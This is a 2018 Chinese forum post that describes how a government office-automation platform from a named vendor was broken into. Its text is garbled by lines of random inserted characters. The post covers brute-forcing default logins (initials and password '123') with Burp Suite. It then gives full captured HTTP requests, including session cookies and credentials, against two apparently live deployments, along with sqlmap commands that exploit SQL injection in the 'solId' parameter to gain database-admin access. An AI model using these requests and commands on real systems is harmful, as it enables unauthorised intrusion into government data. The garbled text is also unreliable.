|
0 _9 l0 Y2 y, K7 g3 ~( }
7 K* `/ l& z; f0 t2 e1 G
. y5 E6 J" R5 P. R, c2 `& ~% g8 x; H* l- L+ _1 a* F- Y4 y
平台简介:) j9 ?. e4 p6 d7 e. x: q6 g" L5 w
8 b1 f5 W2 c" b
3 F; j( D* X- S9 Q. |5 q
. b: h8 q1 ~# I2 T c6 ], S) A 2 r/ G1 @( ~+ F. {+ s2 n, x, p
2 T8 P5 H( D) D" p! s' x$ [( z8 h 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ f, K7 e# m. {: _0 m, \, n同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( w3 x" S, d8 }4 q
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' V1 l0 V% ~5 t7 {4 d, }: D
9 K- U0 j1 l! V0 S: }0 `, t
! l& {4 b# \( ]+ }2 Y; D7 @
' n4 z# A: F% ] 1 f$ c" f# M0 s# d% v
( W" l$ a; ^9 a2 b! s, }/ @- d 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; ]+ ~, X5 w* I/ H- S" `
+ ^% D7 j! Z# T( ^1 k* ]9 P0 V, ]3 }# j# J
* |+ R6 g& a7 P! A0 X' Y0 A2 `
8 l& Z! t/ s0 o4 W: M! \0 e4 i
& t! {5 g/ h( i1 j) g1 _0 L http://1.1.1.1:7197/cap-aco/#(案例2-)
P6 S$ p. S$ @' M d2 I% y( p' `. f
+ [5 R. p0 h0 ?4 B1 N/ t' m. J* K. r7 v" ^" k: l% L
http://www.XXOO.com (案例1-官网网站)4 Z* v( ?, N' `, R# z5 G0 L% y) K& v
, \( o4 X" ]/ R% B$ j# R8 ~9 o6 q
/ g5 r7 _4 w0 m0 O: ]- D" l
( K9 j2 l# E7 o ) X2 `$ h" i" d# J3 x. ^. n, X1 [
# ?" L$ j" q; w7 e" k+ m( L, Q
漏洞详情:
; _& k( M* `- D# g
5 J9 m8 @) K' X+ [, I9 j* N) u7 d% b7 z. ^1 S
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试/ g6 y' J9 W. n0 H( \1 T% q9 h
1 {' w5 i" e0 q
3 p8 z1 V$ a: ^% \- J 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:5 V2 v9 q) e0 O, I0 K* A s2 |6 k
! v( Q! Y5 L/ i2 W) h: U0 r8 u: m g9 p- n) V# X
6 ^& U5 b1 {' H+ v 8 U# a, ~* [7 @- ]5 l
3 P% U2 y3 }; N 
; J* Z9 B1 [# u8 Q& _) D * X0 w3 j1 {$ X9 m! M
7 M3 {: x& {# f' H5 M4 S( |
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:, X* P- o0 e( Q4 h' ]7 E
3 g8 U7 Z& x5 K; N" U# y
, `8 O" J# [6 h
1、案例1-官方网站
; H1 C" P& g- A# r0 D / F- b& H# q0 j# _
: ~# d9 l( o- E) {4 W
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
/ n" J- n5 g! a0 p8 R
+ I# j7 q, m3 ]9 m
: ?; \' U/ M# t7 N Host: www.XXOO.com; Q1 g( |! {* k% c7 h
- m( H. K* Q3 T7 c, k4 r/ `" @ @/ v: D* N8 ?
Proxy-Connection: Keep-Alive
. V; `9 ]2 [+ D7 F% r' Z $ A& g# N8 E8 k7 J2 o) R, ^/ o+ e
' n) C$ G* z r$ z6 A Accept: application/json, text/javascript, */*; q=0.010 w( P3 M( N4 a, _" I2 z
' @# T6 Q+ L- R. Z( w$ s; w
+ R0 t* f8 _' C+ J$ |( y& w9 W Accept-Language: zh-CN2 r4 B' N( T5 p3 g5 h
% T/ l. ~: g* ?" k
5 H6 ^8 b4 e8 |: l) [4 p4 q
Content-Type: application/json
) s$ G4 m. X, N, ~) q5 w
1 T3 |. E4 _" o* p- H* z1 @7 n7 B2 `. M7 P* X$ y$ m3 K( ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
& J$ I, P8 ]/ z+ M
9 ]( w3 c( c, V- H8 `
8 |! R R6 q/ a4 |: a f- G- h X-Requested-With: XMLHttpRequest' O- C t8 k$ f5 b
1 \. D9 p$ d/ T" h8 X. R4 I6 M# c* t5 u9 o( q& T& E
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, W- o9 y% t# j
/ y4 G& g7 P- S
9 t! z h& I- A4 b8 {, N2 H0 Q Accept-Encoding: gzip, deflate, sdch
- T7 }, f/ K( \7 T$ m0 W
( j* K- w1 u' Y; r2 W0 W: ^3 V, N
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
7 E1 z- o- S4 p, P% @4 o" r ; y' e4 ^* _8 ]0 ?8 S6 B
, R& W' J% X3 _; E; e6 ^- {9 ~* O 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
+ f# k" ]- Z, Z ' I/ s* u: H) z! n7 H) k
3 L: y! X8 D0 Q2 d8 A% ^ 
$ e4 F0 f' ^- W/ g
: @& Z+ B! u- s. \* R4 `% ^
) u% A7 N- g5 I5 U7 b$ i, q6 W6 R/ V1 H  P0 J/ I& ~1 }3 j. k" C! [, F
1 Y# r; x# A* [, Q# J
( V/ ^3 z0 |9 G! k& B
- U3 b/ g9 |) d6 g0 z+ ]8 j4 O' o " V0 b4 t5 v/ [0 Y
( w& ?) T9 V1 e
8 h$ I1 m1 R3 ~, Q * Q5 K: `' [! O- @' H
2 l" Q- u; d4 } T) a
# S6 Q8 i, Q& @0 u4 \+ \ " J! o' L1 d! A* J2 P7 S+ {9 S$ u
6 ^7 j! |8 w3 C$ \
2、案例2-某天河云平台0 s" s1 q& c, G) v* v; S
/ i# T, d4 ^" z0 S5 D9 `( }, f
6 ~$ j' F) t% n- t" h& v5 |) Z GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
* W" l1 i* n1 F ?% Y( r, a" `8 l
& v t$ n# ^& Z9 F8 }9 {& |, X* _" o7 h3 c# M$ }( b
Host: 1.1.1.:7197
, L' r% r% W1 w8 f
: R7 C- d: E( [* V( ?; x- A# l3 d* D. j$ P1 i& `3 J
Accept: application/json, text/javascript, */*; q=0.018 f/ e2 k& P' p* y ~1 X
3 t2 w& T) s: k6 K8 p
3 b# v- f5 ?3 ^% `! n' V
X-Requested-With: XMLHttpRequest3 s# l6 e& B$ t7 q- M0 |2 U D/ @+ m
4 c( I6 a% c" o
+ S6 [3 }# Q3 u5 S9 @$ T1 y, N# r User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
, y5 H3 p4 l+ X/ T
0 K3 f* ?7 \% N" k4 P
! L2 n; \6 W- O" U6 m4 A: E, a Content-Type: application/json( T9 U4 E' v& j1 I
5 x) c$ p& n8 j
4 ~ x: y) ^ E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
6 H$ d! e5 T) P; @
. h( O# s2 \7 D! k K; I. V6 R Z% p! u% l7 F$ s
Accept-Language: zh-CN,zh;q=0.8' \7 Q* Q: ]+ C$ A% U
" v: k( s) B/ n4 I. t3 b
: _& C9 f/ o/ e- C( G Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=13 G; Y8 A4 e* Y: t4 M# v% a
* k6 g, y7 u3 t4 N
6 k, E" q2 r4 V5 f6 U3 L
Connection: close$ c( p. `3 H% y% X7 C8 M) B
( v9 x+ U- U% E$ g( }' s+ t2 y4 a. T& t6 W* }
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
0 b) T6 ^6 q9 f' }- Y; J
/ { P: Z5 s; `9 i' b$ U4 \
: p% E9 \ w8 h& n6 S+ l1 a: U  * c+ V0 q4 y! m% i( l; U [
! g, L: y; m3 Z5 r( |9 H! S) A4 Y# x( _5 v Z4 }+ ~9 n) Z, x6 @
2 l* M E( r+ q$ m5 i& i | 
发表于 2018-10-20 20:15:17
收藏
支持
反对